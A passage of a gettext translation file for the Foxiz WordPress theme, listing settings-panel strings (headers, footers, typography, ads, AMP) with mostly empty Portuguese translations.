Widgets" msgstr "" #: backend/category-settings.php:397 backend/panels/blog-pages.php:424 #: backend/panels/blog-pages.php:911 backend/panels/blog-pages.php:1325 #: backend/panels/blog-pages.php:1733 backend/panels/blog-pages.php:2225 #: backend/panels/bookmark.php:323 backend/panels/bookmark.php:771 msgid "Excerpt" msgstr "" #: backend/category-settings.php:408 backend/panels/block-classic.php:90 #: backend/panels/block-grid.php:90 backend/panels/block-grid.php:255 #: backend/panels/block-grid.php:420 backend/panels/block-grid.php:593 #: backend/panels/block-grid.php:780 backend/panels/block-list.php:98 #: backend/panels/block-list.php:271 backend/panels/block-list.php:452 #: backend/panels/block-list.php:647 backend/panels/blog-pages.php:434 #: backend/panels/blog-pages.php:921 backend/panels/blog-pages.php:1335 #: backend/panels/blog-pages.php:1743 backend/panels/blog-pages.php:2235 #: backend/panels/bookmark.php:333 backend/panels/bookmark.php:781 msgid "Excerpt - Max Length" msgstr "" #: backend/category-settings.php:416 backend/panels/block-classic.php:97 #: backend/panels/block-grid.php:97 backend/panels/block-grid.php:262 #: backend/panels/block-grid.php:427 backend/panels/block-grid.php:600 #: backend/panels/block-grid.php:787 backend/panels/block-list.php:105 #: backend/panels/block-list.php:278 backend/panels/block-list.php:459 #: backend/panels/block-list.php:654 backend/panels/blog-pages.php:442 #: backend/panels/blog-pages.php:929 backend/panels/blog-pages.php:1343 #: backend/panels/blog-pages.php:1751 backend/panels/blog-pages.php:2243 #: backend/panels/bookmark.php:341 backend/panels/bookmark.php:789 msgid "Excerpt - Source" msgstr "" #: backend/panels/color.php:123 msgid "Excerpt Color" msgstr "" #: backend/category-settings.php:219 msgid "" "Exclude tag slugs for the latest blog. Separated by commas (for example: " "tagslug1,tagslug2,tagslug3)." msgstr "" #: backend/category-settings.php:218 msgid "Exclude Tags Slug" msgstr "" #: backend/class-tgm-plugin-activation.php:2389 msgid "External Source" msgstr "" #: backend/panels/single-post.php:723 backend/panels/single-post.php:862 #: backend/panels/single-post.php:1000 backend/panels/single-post.php:1633 #: templates/parts.php:591 msgid "Facebook" msgstr "" #: backend/panels/optimized.php:244 msgid "Facebook APP ID" msgstr "" #: backend/panels/optimized.php:253 msgid "Facebook Default Image" msgstr "" #: backend/panels/socials.php:28 msgid "Facebook URL" msgstr "" #: backend/panels/design.php:446 msgid "Fade" msgstr "" #: backend/single-metaboxes.php:667 msgid "Fake View Value" msgstr "" #: backend/panels/design.php:265 msgid "Fallback Meta" msgstr "" #: backend/single-metaboxes.php:251 msgid "Featured Caption" msgstr "" #: backend/single-metaboxes.php:243 msgid "Featured Crop Size" msgstr "" #: backend/panels/design.php:639 msgid "Featured GIF" msgstr "" #: backend/panels/design.php:294 backend/single-metaboxes.php:238 msgid "Featured Image" msgstr "" #: backend/category-settings.php:328 backend/panels/block-classic.php:31 #: backend/panels/block-grid.php:31 backend/panels/block-grid.php:196 #: backend/panels/block-grid.php:361 backend/panels/block-grid.php:534 #: backend/panels/block-grid.php:721 backend/panels/block-list.php:31 #: backend/panels/block-list.php:204 backend/panels/block-list.php:385 #: backend/panels/block-list.php:580 backend/panels/blog-pages.php:349 #: backend/panels/blog-pages.php:836 backend/panels/blog-pages.php:1250 #: backend/panels/blog-pages.php:1658 backend/panels/blog-pages.php:2150 #: backend/panels/bookmark.php:249 backend/panels/bookmark.php:697 msgid "Featured Image Size" msgstr "" #: backend/category-settings.php:86 msgid "Featured Images" msgstr "" #: backend/panels/block-list.php:39 backend/panels/block-list.php:212 #: backend/panels/block-list.php:393 backend/panels/block-list.php:588 msgid "Featured Position" msgstr "" #: backend/single-metaboxes.php:574 msgid "Final Summary" msgstr "" #: templates/blog.php:94 msgid "Find More:" msgstr "Encontrar mais" #: backend/panels/privacy.php:26 msgid "Fixed Bottom" msgstr "" #: backend/panels/amp.php:332 backend/panels/amp.php:392 #: backend/panels/amp.php:452 backend/panels/amp.php:513 #: backend/panels/amp.php:573 msgid "Fixed Height (90px)" msgstr "" #: backend/panels/privacy.php:24 msgid "Fixed Left" msgstr "" #: backend/panels/single-post.php:975 msgid "Fixed Left Area" msgstr "" #: backend/panels/amp.php:186 backend/panels/single-post.php:983 msgid "Fixed Left Share Bar" msgstr "" #: templates/parts.php:612 msgid "Flickr" msgstr "" #: backend/panels/socials.php:74 msgid "Flickr URL" msgstr "" #: backend/panels/ads.php:421 msgid "Float Left" msgstr "" #: backend/panels/ads.php:422 msgid "Float Right" msgstr "" #: backend/panels/single-post.php:82 msgid "Floating Video" msgstr "" #: backend/panels/single-post.php:83 msgid "Floating video on the screen on scroll." msgstr "" #: templates/parts.php:802 msgid "Follow" msgstr "" #: backend/panels/bookmark.php:456 msgid "Follow categories that you're interested in" msgstr "" #: backend/panels/bookmark.php:477 msgid "Follow Page URL" msgstr "" #: templates/footer.php:212 templates/header/templates.php:621 msgid "Follow US" msgstr "Nos siga nas redes sociais" #: templates/blog.php:465 templates/entry.php:1171 msgid "Follow: " msgstr "" #: backend/panels/design.php:704 msgid "Font Awesome" msgstr "" #: backend/panels/typography.php:91 msgid "Font Size" msgstr "" #: backend/panels/footer.php:15 msgid "Footer" msgstr "" #: backend/panels/amp.php:360 msgid "Footer - Ad Type" msgstr "" #: backend/panels/amp.php:388 msgid "Footer - Adsense Size" msgstr "" #: backend/panels/amp.php:400 msgid "Footer - AMP Custom Ad Script" msgstr "" #: includes/sidebars.php:105 msgid "Footer - Column 1" msgstr "" #: includes/sidebars.php:114 msgid "Footer - Column 2" msgstr "" #: includes/sidebars.php:123 msgid "Footer - Column 3" msgstr "" #: includes/sidebars.php:133 msgid "Footer - Column 4" msgstr "" #: includes/sidebars.php:144 msgid "Footer - Column 5" msgstr "" #: backend/panels/amp.php:372 msgid "Footer - Data Ad Client" msgstr "" #: backend/panels/amp.php:380 msgid "Footer - Data Ad Slot" msgstr "" #: includes/sidebars.php:96 msgid "Footer - Top Full Width" msgstr "" #: backend/panels/amp.php:354 msgid "Footer Ad Settings" msgstr "" #: backend/panels/single-post.php:290 msgid "Footer Area" msgstr "" #: backend/panels/footer.php:30 msgid "Footer Background" msgstr "" #: backend/panels/footer.php:136 msgid "Footer Bottom Section" msgstr "" #: backend/panels/header.php:156 backend/panels/header.php:388 msgid "Footer Copyright" msgstr "" #: backend/panels/footer.php:144 msgid "Footer Logo" msgstr "" #: backend/panels/header.php:149 backend/panels/header.php:381 msgid "Footer Menu" msgstr "" #: backend/panels/ads.php:454 msgid "Footer Slide Up" msgstr "" #: backend/panels/ads.php:462 msgid "Footer Slide Up Section" msgstr "" #: backend/panels/footer.php:23 msgid "Footer Style" msgstr "" #: backend/single-metaboxes.php:172 backend/single-metaboxes.php:949 msgid "Footer Template Shortcode" msgstr "" #: backend/panels/newsletter.php:55 msgid "Footer Text" msgstr "" #: backend/panels/newsletter.php:62 msgid "Footer URL" msgstr "" #: backend/panels/heading.php:104 msgid "Footer Widget Heading Layout" msgstr "" #: backend/panels/footer.php:80 msgid "Footer Widget Section" msgstr "" #: backend/panels/footer.php:120 msgid "Footer Widgets - Template Shortcode" msgstr "" #: backend/panels/footer.php:90 msgid "Footer Widgets Layout" msgstr "" #: backend/single-metaboxes.php:490 msgid "Force Enable for This Post" msgstr "" #: backend/panels/optimized.php:90 msgid "Force write Dynamic CSS to file" msgstr "" #: backend/panels/header.php:565 msgid "Form Description" msgstr "" #: backend/panels/header.php:558 msgid "Form Heading" msgstr "" #: backend/panels/header.php:572 msgid "Form Logo" msgstr "" #: backend/category-settings.php:18 msgid "Foxiz - Individual Category Settings" msgstr "" #: backend/install-plugins.php:19 msgid "Foxiz Core" msgstr "" #: backend/theme-options.php:219 msgid "Foxiz Panel" msgstr "" #: backend/install-plugins.php:71 #, php-format msgid "Foxiz recommends the following plugin: %1$s." msgstr "" #: backend/install-plugins.php:70 #, php-format msgid "Foxiz the following plugin: %1$s." msgstr "" #: backend/panels/design.php:318 msgid "From The Center" msgstr "" #: backend/panels/design.php:317 msgid "From The Top" msgstr "" #: backend/panels/ads.php:420 backend/panels/page.php:46 #: backend/panels/single-post.php:174 backend/panels/single-post.php:186 #: backend/single-metaboxes.php:75 msgid "Full Width" msgstr "" #: backend/panels/table-contents.php:116 backend/single-metaboxes.php:729 msgid "Full Width (1 Column)" msgstr "" #: backend/panels/header-style.php:61 backend/panels/header-style.php:355 #: backend/panels/header-style.php:605 msgid "Full Width (100%)" msgstr "" #: backend/panels/table-contents.php:114 backend/single-metaboxes.php:727 msgid "Full Width (2 Columns)" msgstr "" #: backend/panels/typography.php:704 msgid "Full Width Headline" msgstr "" #: backend/panels/typography.php:761 msgid "Full Width Tagline" msgstr "" #: backend/panels/design.php:362 msgid "G1- 330x220" msgstr "" #: backend/panels/design.php:370 msgid "G2 - 420x280" msgstr "" #: backend/panels/design.php:378 msgid "G3 - 615x410" msgstr "" #: backend/single-metaboxes.php:418 msgid "Gallery Format" msgstr "" #: backend/panels/design.php:484 msgid "Gallery Icon" msgstr "" #: backend/panels/design.php:507 msgid "Gallery Icon Color" msgstr "" #: backend/panels/single-post.php:132 backend/single-metaboxes.php:424 msgid "Gallery Layout" msgstr "" #: backend/panels/single-post.php:126 msgid "Gallery Post Format Layout" msgstr "" #: backend/panels/amp.php:40 backend/panels/bookmark.php:28 #: backend/panels/general.php:10 backend/panels/header.php:31 #: backend/panels/single-post.php:1590 msgid "General" msgstr "" #: backend/panels/design.php:303 backend/panels/header-style.php:24 #: backend/panels/header-style.php:318 backend/panels/header-style.php:569 #: backend/panels/page.php:24 backend/single-metaboxes.php:51 msgid "General Settings" msgstr "" #: backend/panels/general.php:11 msgid "General settings for your website." msgstr "" #: backend/panels/design.php:647 msgid "GIF Supported" msgstr "" #: backend/category-settings.php:150 backend/panels/blog-pages.php:148 #: backend/panels/blog-pages.php:685 backend/panels/blog-pages.php:1101 #: backend/panels/blog-pages.php:1509 backend/panels/blog-pages.php:2002 msgid "Global Blog Template Builder" msgstr "" #: backend/panels/color.php:15 msgid "Global Colors" msgstr "" #: backend/panels/header.php:50 msgid "Global Header Style" msgstr "" #: backend/panels/header.php:59 msgid "Global Header Template Shortcode" msgstr "" #: backend/panels/heading.php:35 msgid "Global Heading" msgstr "" #: backend/panels/heading.php:40 msgid "Global Heading Layout" msgstr "" #: backend/panels/color.php:28 msgid "Global Highlight Color" msgstr "" #: backend/panels/general.php:34 msgid "Global Search Placeholder" msgstr "" #: backend/panels/breadcrumb.php:23 msgid "Global Setting" msgstr "" #: backend/panels/sidebar.php:26 msgid "Global Sidebar Position" msgstr "" #: backend/panels/header.php:40 msgid "Global Site Header" msgstr "" #: backend/category-settings.php:155 backend/panels/blog-pages.php:153 #: backend/panels/blog-pages.php:691 backend/panels/blog-pages.php:1106 #: backend/panels/blog-pages.php:1515 backend/panels/blog-pages.php:2007 msgid "Global WP Query Template Shortcode" msgstr "" #: templates/single/review-comment.php:91 msgid "Good" msgstr "" #: templates/single/reviews.php:175 msgid "Good Stuff" msgstr "" #: backend/panels/block-grid.php:27 backend/panels/block-grid.php:192 msgid "grid" msgstr "" #: backend/panels/single-post.php:1340 msgid "Grid 1 (3 Columns)" msgstr "" #: backend/category-settings.php:244 backend/configs.php:451 #: backend/panels/block-grid.php:17 msgid "Grid 1 (Standard)" msgstr "" #: backend/category-settings.php:245 backend/configs.php:455 #: backend/panels/block-grid.php:182 msgid "Grid 2" msgstr "" #: backend/panels/bookmark.php:54 msgid "Guest and Logged Users" msgstr "" #: backend/panels/bookmark.php:71 msgid "Guest Bookmark Expiration" msgstr "" #: backend/configs.php:237 msgid "H1" msgstr "" #: backend/panels/typography.php:129 msgid "H1 Font" msgstr "" #: backend/panels/typography.php:121 msgid "H1 Tag" msgstr "" #: backend/configs.php:238 backend/panels/single-post.php:532 #: backend/single-metaboxes.php:224 msgid "H2" msgstr "" #: backend/panels/typography.php:178 msgid "H2 Font" msgstr "" #: backend/panels/typography.php:170 msgid "H2 Tag" msgstr "" #: backend/configs.php:239 backend/panels/single-post.php:533 #: backend/single-metaboxes.php:225 msgid "H3" msgstr "" #: backend/panels/typography.php:227 msgid "H3 Font" msgstr "" #: backend/panels/typography.php:219 msgid "H3 Tag" msgstr "" #: backend/configs.php:240 backend/panels/single-post.php:534 #: backend/single-metaboxes.php:226 msgid "H4" msgstr "" #: backend/panels/typography.php:276 msgid "H4 Font" msgstr "" #: backend/panels/typography.php:268 msgid "H4 Tag" msgstr "" #: backend/configs.php:241 backend/panels/single-post.php:535 #: backend/single-metaboxes.php:227 msgid "H5" msgstr "" #: backend/panels/typography.php:325 msgid "H5 Font" msgstr "" #: backend/panels/typography.php:317 msgid "H5 Tag" msgstr "" #: backend/configs.php:242 backend/panels/single-post.php:536 #: backend/single-metaboxes.php:228 msgid "H6" msgstr "" #: backend/panels/typography.php:374 msgid "H6 Font" msgstr "" #: backend/panels/typography.php:366 msgid "H6 Tag" msgstr "" #: backend/configs.php:844 msgid "Half banner (234x60)" msgstr "" #: backend/configs.php:854 msgid "Half Page (300x600)" msgstr "" #: backend/panels/table-contents.php:115 backend/single-metaboxes.php:728 msgid "Half Width" msgstr "" #: backend/panels/reaction.php:44 msgid "Happy" msgstr "" #: templates/header/templates.php:615 msgid "Have an existing account?" msgstr "" #: backend/panels/header.php:16 msgid "Header" msgstr "" #: backend/panels/amp.php:300 msgid "Header - Ad Type" msgstr "" #: backend/panels/amp.php:328 msgid "Header - Adsense Size" msgstr "" #: backend/panels/amp.php:340 msgid "Header - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:312 msgid "Header - Data Ad Client" msgstr "" #: backend/panels/amp.php:320 msgid "Header - Data Ad Slot" msgstr "" #: backend/panels/amp.php:294 msgid "Header Ad Settings" msgstr "" #: includes/sidebars.php:79 msgid "Header Advertising" msgstr "" #: backend/single-metaboxes.php:153 backend/single-metaboxes.php:930 msgid "Header Alert Bar" msgstr "" #: backend/panels/blog-pages.php:1968 backend/panels/header.php:408 #: backend/panels/header.php:462 msgid "Header Background" msgstr "" #: backend/category-settings.php:92 backend/panels/blog-pages.php:90 #: backend/panels/blog-pages.php:1084 backend/panels/blog-pages.php:1492 msgid "Header Background Style" msgstr "" #: backend/panels/header-style.php:80 msgid "Header Height" msgstr "" #: backend/panels/blog-pages.php:2390 msgid "Header Image" msgstr "" #: backend/panels/typography.php:893 msgid "Header Menus" msgstr "" #: backend/panels/header.php:738 msgid "Header Mini Cart" msgstr "" #: backend/panels/header.php:173 msgid "Header Search" msgstr "" #: backend/panels/header.php:195 msgid "Header Search Icon" msgstr "" #: backend/category-settings.php:56 backend/panels/blog-pages.php:37 #: backend/panels/blog-pages.php:603 backend/panels/blog-pages.php:1921 #: backend/panels/single-post.php:1555 backend/single-metaboxes.php:890 msgid "Header Style" msgstr "" #: backend/panels/header-style.php:15 msgid "Header Style 1,2,3" msgstr "" #: backend/panels/header-style.php:309 msgid "Header Style 4" msgstr "" #: backend/panels/header-style.php:560 msgid "Header Style 5" msgstr "" #: backend/category-settings.php:64 backend/panels/blog-pages.php:60 #: backend/panels/blog-pages.php:626 backend/panels/blog-pages.php:1944 #: backend/panels/woocommerce.php:60 backend/single-metaboxes.php:121 #: backend/single-metaboxes.php:898 msgid "Header Template Shortcode" msgstr "" #: backend/panels/header-style.php:56 backend/panels/header-style.php:350 #: backend/panels/header-style.php:601 msgid "Header Width" msgstr "" #: backend/category-settings.php:182 backend/panels/blog-pages.php:204 #: backend/panels/blog-pages.php:2404 msgid "Heading" msgstr "" #: backend/panels/bookmark.php:133 backend/panels/bookmark.php:483 msgid "Heading background Style" msgstr "" #: backend/panels/heading.php:129 msgid "Heading Color" msgstr "" #: backend/panels/heading.php:15 msgid "Heading Design" msgstr "" #: backend/panels/typography.php:1038 msgid "Heading Font" msgstr "" #: backend/category-settings.php:205 backend/panels/blog-pages.php:227 #: backend/panels/bookmark.php:540 backend/panels/single-post.php:1327 msgid "Heading Font Size (Desktop)" msgstr "" #: backend/category-settings.php:197 backend/panels/blog-pages.php:219 #: backend/panels/bookmark.php:532 backend/panels/single-post.php:1319 msgid "Heading HTML Tag" msgstr "" #: backend/category-settings.php:189 backend/panels/blog-pages.php:211 #: backend/panels/bookmark.php:524 backend/panels/single-post.php:1311 msgid "Heading Layout" msgstr "" #: backend/panels/table-contents.php:50 msgid "Heading Tag Supported" msgstr "" #: backend/panels/typography.php:1039 msgid "" "Heading tag will use default H tag font settings. Select font values if you " "would like to choose a custom font." msgstr "" #: backend/single-metaboxes.php:750 msgid "Headings Table" msgstr "" #: templates/header/templates.php:289 msgid "Hi," msgstr "Olá," #: backend/panels/single-post.php:1442 msgid "" "Hide a part of content of next posts and show the button to increase page " "views." msgstr "" #: backend/panels/single-post.php:402 msgid "Hide Next/Prev Post pagination on the mobile device." msgstr "" #: backend/configs.php:861 msgid "Hide on Desktop" msgstr "" #: backend/panels/single-post.php:1465 msgid "Hide Sidebar on Mobile" msgstr "" #: backend/category-settings.php:466 backend/panels/block-classic.php:130 #: backend/panels/block-grid.php:130 backend/panels/block-grid.php:295 #: backend/panels/block-grid.php:460 backend/panels/block-grid.php:633 #: backend/panels/block-grid.php:820 backend/panels/block-list.php:138 #: backend/panels/block-list.php:311 backend/panels/block-list.php:492 #: backend/panels/block-list.php:687 backend/panels/blog-pages.php:491 #: backend/panels/blog-pages.php:978 backend/panels/blog-pages.php:1392 #: backend/panels/blog-pages.php:1800 backend/panels/blog-pages.php:2292 #: backend/panels/bookmark.php:390 backend/panels/bookmark.php:838 msgid "Hide the entry category on the tablet and mobile devices." msgstr "" #: backend/category-settings.php:496 backend/panels/block-classic.php:156 #: backend/panels/block-grid.php:156 backend/panels/block-grid.php:321 #: backend/panels/block-grid.php:486 backend/panels/block-grid.php:659 #: backend/panels/block-grid.php:846 backend/panels/block-list.php:164 #: backend/panels/block-list.php:337 backend/panels/block-list.php:518 #: backend/panels/block-list.php:713 backend/panels/blog-pages.php:521 #: backend/panels/blog-pages.php:1008 backend/panels/blog-pages.php:1422 #: backend/panels/blog-pages.php:1830 backend/panels/blog-pages.php:2322 #: backend/panels/bookmark.php:412 backend/panels/bookmark.php:868 msgid "Hide the post excerpt on the tablet and mobile devices." msgstr "" #: backend/panels/single-post.php:1466 msgid "Hide the post sidebar on the mobile device when load next posts." msgstr "" #: backend/panels/header.php:712 msgid "Hide this bar on the sticky navigation." msgstr "" #: backend/panels/header.php:711 msgid "Hide when Sticky" msgstr "" #: backend/mega-menu.php:142 msgid "Hierarchical" msgstr "" #: backend/category-settings.php:30 backend/panels/design.php:44 msgid "Highlight Color" msgstr "" #: backend/panels/color.php:23 msgid "Highlight Colors" msgstr "" #: backend/panels/single-post.php:544 msgid "Highlight Heading" msgstr "" #: backend/single-metaboxes.php:212 msgid "Highlight Point" msgstr "" #: backend/panels/single-post.php:1490 backend/panels/single-post.php:1499 msgid "Highlight Shares" msgstr "" #: backend/panels/single-post.php:546 msgid "Highlights" msgstr "" #: backend/panels/optimized.php:181 msgid "Home Description" msgstr "" #: backend/panels/header-style.php:140 backend/panels/header-style.php:218 #: backend/panels/header-style.php:284 backend/panels/header-style.php:428 #: backend/panels/header-style.php:507 backend/panels/header-style.php:695 #: backend/panels/header-style.php:773 msgid "Hover Accent Color" msgstr "" #: backend/panels/design.php:567 msgid "Hover Effects" msgstr "" #: backend/panels/header-style.php:132 backend/panels/header-style.php:210 #: backend/panels/header-style.php:276 backend/panels/header-style.php:420 #: backend/panels/header-style.php:499 backend/panels/header-style.php:687 #: backend/panels/header-style.php:765 msgid "Hover Text Color" msgstr "" #: backend/panels/single-post.php:529 msgid "HTML Tag" msgstr "" #: backend/panels/design.php:180 msgid "Human Time Format" msgstr "" #: backend/panels/single-post.php:218 msgid "Hyperlink Color" msgstr "" #: backend/panels/single-post.php:200 msgid "Hyperlink Settings" msgstr "" #: backend/panels/single-post.php:205 msgid "Hyperlink Style" msgstr "" #: backend/panels/single-post.php:234 msgid "Hyperlink Underline" msgstr "" #: backend/panels/header.php:550 msgid "Icon" msgstr "" #: backend/mega-menu.php:238 msgid "Icon Classname" msgstr "" #: backend/panels/ads.php:39 msgid "" "If you use auto ads code, you need to disable any other adsense units code." msgstr "" #: backend/panels/design.php:246 msgid "" "If you use font Awesome. ensure that the setting in \"Theme Design > Font " "Awesome\" is enabled." msgstr "" #: backend/single-metaboxes.php:344 backend/single-metaboxes.php:392 msgid "Iframe Embed Code" msgstr "" #: backend/panels/dark-mode.php:35 msgid "Image Opacity" msgstr "" #: backend/panels/typography.php:488 msgid "Important Meta Font" msgstr "" #: backend/panels/header-style.php:89 backend/panels/header-style.php:377 #: backend/panels/header-style.php:644 msgid "" "In case you would like to switch layout and text to light when set a dark " "background for sub menu in light mode." msgstr "" #: backend/panels/single-post.php:1374 msgid "Infinite Scroll" msgstr "" #: backend/configs.php:563 backend/panels/bookmark.php:575 msgid "Infinite Scroll (Ajax)" msgstr "" #: backend/panels/amp.php:541 msgid "Inline - Ad Type" msgstr "" #: backend/panels/amp.php:569 msgid "Inline - Adsense Size" msgstr "" #: backend/panels/amp.php:581 msgid "Inline - AMP Custom Ad Script" msgstr "" #: backend/panels/amp.php:553 msgid "Inline - Data Ad Client" msgstr "" #: backend/panels/amp.php:561 msgid "Inline - Data Ad Slot" msgstr "" #: backend/panels/single-post.php:1259 msgid "Inline Content Related Box" msgstr "" #: backend/panels/ads.php:265 msgid "Inline Single Content" msgstr "" #: backend/panels/amp.php:535 msgid "Inline Single Content Ad Settings" msgstr "" #: backend/panels/typography.php:593 msgid "Input & Textarea Font" msgstr "" #: backend/panels/blog-pages.php:154 backend/panels/blog-pages.php:1107 #: backend/panels/blog-pages.php:1516 backend/panels/blog-pages.php:2008 msgid "" "Input a \"Ruby Template\" shortcode to display as the main blog posts, ie: " "[Ruby_E_Template id=\"1\"]." msgstr "" #: backend/panels/blog-pages.php:120 msgid "" "Input a \"Ruby Template\" shortcode to embed it after the category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:130 msgid "" "Input a \"Ruby Template\" shortcode to embed it after this category header, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:659 msgid "" "Input a \"Ruby Template\" shortcode to embed it the bottom of the blog page, " "ie: [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/panels/blog-pages.php:650 msgid "" "Input a \"Ruby Template\" shortcode to embed it the top of the blog page, ie:" " [Ruby_E_Template id=\"1\"]" msgstr "" #: backend/category-settings.php:156 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing " "for this category." msgstr "" #: backend/panels/blog-pages.php:692 msgid "" "Input a \"Ruby Template\" shortcode to show it as a the main blog listing." msgstr "" #: backend/panels/design.php:330 msgid "Input a custom crop size: width x height. For example: 300x200" msgstr "" #: backend/panels/single-post.php:498 msgid "Input a custom font size value (in px) for the single entry category." msgstr "" #: backend/panels/blog-pages.php:228 msgid "" "Input a custom font size value for the category heading (px) on the desktop." msgstr "" #: backend/category-settings.php:206 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default value." msgstr "" #: backend/panels/bookmark.php:541 backend/panels/single-post.php:1328 msgid "" "Input a custom font size value for this heading (px) on the desktop. Leave " "this option blank to set the default." msgstr "" #: backend/panels/header.php:603 msgid "Input a custom forget password URL if have." msgstr "" #: backend/panels/single-post.php:1754 msgid "" "Input a custom height value (px) for this bar. Leave blank to set it as the " "default." msgstr "" #: backend/panels/header.php:354 msgid "Input a custom height value for the mobile navigation, Default is 40px." msgstr "" #: backend/panels/header.php:596 msgid "Input a custom register URL if have." msgstr "" #: backend/panels/design.php:686 msgid "Input a custom round corner (in px) for your website." msgstr "" #: backend/panels/design.php:436 msgid "" "Input a custom time value to next a slide in milliseconds (default is 5000)." msgstr "" #: backend/panels/ads.php:495 msgid "" "Input a delay time (ms) value to show the slide up after the site loaded." msgstr "" #: backend/panels/adblock.php:34 msgid "Input a description for the adblock popup." msgstr "" #: backend/panels/ads.php:410 msgid "Input a description for the adverting box." msgstr "" #: backend/panels/header.php:566 msgid "" "Input a description for the login form. Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:278 msgid "Input a destination URL for the notification panel." msgstr "" #: backend/panels/footer.php:208 msgid "Input a font size value (in px) for the copy right text." msgstr "" #: backend/panels/footer.php:114 msgid "" "Input a font size value (in px) for the default menu widgets are displaying " "in the footer." msgstr "" #: backend/panels/footer.php:214 msgid "Input a font size value (in px) for the footer copyright menu." msgstr "" #: backend/panels/newsletter.php:56 msgid "Input a footer text for the box." msgstr "" #: backend/panels/header.php:188 msgid "Input a heading for displaying above the search form." msgstr "" #: backend/panels/blog-pages.php:2405 msgid "" "Input a heading for the 404 page. Leave this option blank to set it as the " "default." msgstr "" #: backend/panels/single-post.php:545 msgid "Input a heading for the highlights section if it is existing." msgstr "" #: backend/panels/header.php:559 msgid "Input a heading for the login form." msgstr "" #: backend/panels/blog-pages.php:205 msgid "" "Input a heading for the post listing. Leave blank to disable this section" msgstr "" #: backend/category-settings.php:183 msgid "" "Input a heading for the post listing. Leave this option blank to set the " "default." msgstr "" #: backend/panels/bookmark.php:105 backend/panels/bookmark.php:448 #: backend/panels/bookmark.php:519 msgid "Input a heading for this section." msgstr "" #: backend/panels/single-post.php:1305 msgid "Input a heading for this section. Leave -1 to disable this heading." msgstr "" #: backend/panels/amp.php:98 backend/panels/footer.php:159 msgid "Input a height for value for the footer logo, Default is 50px." msgstr "" #: backend/panels/header-style.php:369 backend/panels/header-style.php:636 msgid "Input a max height value for the logo of this header. Default is 60." msgstr "" #: backend/panels/ads.php:201 backend/panels/ads.php:390 msgid "" "Input a max width value (in px) for your ad image, leave blank set full size." msgstr "" #: backend/panels/single-post.php:1133 msgid "Input a meta text for the sponsored posts." msgstr "" #: backend/panels/table-contents.php:126 msgid "" "Input a minimum value for total heading tags to show the table of contents " "box." msgstr "" #: backend/panels/newsletter.php:49 msgid "Input a newsletter shortcode." msgstr "" #: backend/single-metaboxes.php:581 msgid "Input a offer label (Call to action) for this product review." msgstr "" #: backend/panels/single-post.php:1276 msgid "Input a position (after x paragraphs) to display the related bõ." msgstr "" #: backend/panels/table-contents.php:142 msgid "" "Input a position (after x paragraphs) to display the table of contents box." msgstr "" #: backend/single-metaboxes.php:737 msgid "" "Input a position (after x paragraphs) to display the table of contents box. " "Leave blank to use the theme option setting, Set \"-1\" for displaying at " "the top." msgstr "" #: backend/panels/ads.php:429 backend/panels/amp.php:589 msgid "Input a position (after x paragraphs) to display your ads." msgstr "" #: backend/panels/header.php:589 msgid "Input a redirect URL when the user logged in." msgstr "" #: backend/panels/single-post.php:1267 msgid "Input a related shortcode you want to display." msgstr "" #: backend/single-metaboxes.php:173 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this page, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:950 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for " "this post, Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/panels/blog-pages.php:627 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "blog page." msgstr "" #: backend/panels/blog-pages.php:61 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "category pages." msgstr "" #: backend/panels/blog-pages.php:1945 msgid "" "Input a Ruby Template shortcode for displaying as the website header for the " "search page." msgstr "" #: backend/category-settings.php:65 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this category. Leave blank to use the above setting." msgstr "" #: backend/single-metaboxes.php:122 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. Leave this option blank to set as the above setting." msgstr "" #: backend/single-metaboxes.php:899 msgid "" "Input a Ruby Template shortcode for displaying as the website header for " "this page. This setting requests to select \"Use Ruby Template\" in site " "header setting in order to work." msgstr "" #: backend/panels/header.php:60 msgid "Input a Ruby Template shortcode for displaying as the website header." msgstr "" #: backend/single-metaboxes.php:541 msgid "" "Input a short description to display before the review score, For example: " "Good, Bad..." msgstr "" #: backend/single-metaboxes.php:668 msgid "" "Input a starting view value for this post. Leave blank if you want to " "display real data." msgstr "" #: backend/single-metaboxes.php:199 msgid "" "Input a tagline for this post, It will display under the single post title." msgstr "" #: backend/panels/ads.php:470 msgid "" "Input a template shortcode or any other shortcode you would like to show in " "this section." msgstr "" #: backend/panels/adblock.php:27 msgid "Input a title for the adblock popup." msgstr "" #: backend/panels/reaction.php:32 msgid "" "Input a title for the reaction section. Leave blank to set it as the default." msgstr "" #: backend/single-metaboxes.php:497 msgid "Input a title for this review section." msgstr "" #: backend/panels/design.php:69 msgid "" "Input a value to limited numbers of entry category show on all post listing " "layout, useful in case you have many categories per post." msgstr "" #: backend/mega-menu.php:205 msgid "" "Input a width value (in px) for this mega section. Leave blank or 0 to set " "to full width." msgstr "" #: backend/panels/header.php:142 msgid "" "Input a width value (in px) for this section. Leave blank to set a the " "default." msgstr "" #: backend/single-metaboxes.php:547 msgid "Input advantages for this review." msgstr "" #: backend/mega-menu.php:243 msgid "Input attachment image/SVG url to show your icon." msgstr "" #: backend/single-metaboxes.php:259 msgid "Input attribution for the featured image." msgstr "" #: backend/single-metaboxes.php:252 msgid "Input caption text for the featured image." msgstr "" #: backend/panels/header-style.php:629 msgid "" "Input custom height value (px) for the navigation bar of this header. " "Default is 40px." msgstr "" #: backend/panels/header-style.php:362 msgid "Input custom height value (px) for the navigation bar. Default is 40." msgstr "" #: backend/panels/header-style.php:81 msgid "Input custom height value (px) for this header. Default is 60." msgstr "" #: backend/category-settings.php:337 backend/panels/blog-pages.php:359 #: backend/panels/blog-pages.php:846 backend/panels/blog-pages.php:1260 #: backend/panels/blog-pages.php:1668 backend/panels/blog-pages.php:2160 #: backend/panels/bookmark.php:259 backend/panels/bookmark.php:707 msgid "" "Input custom 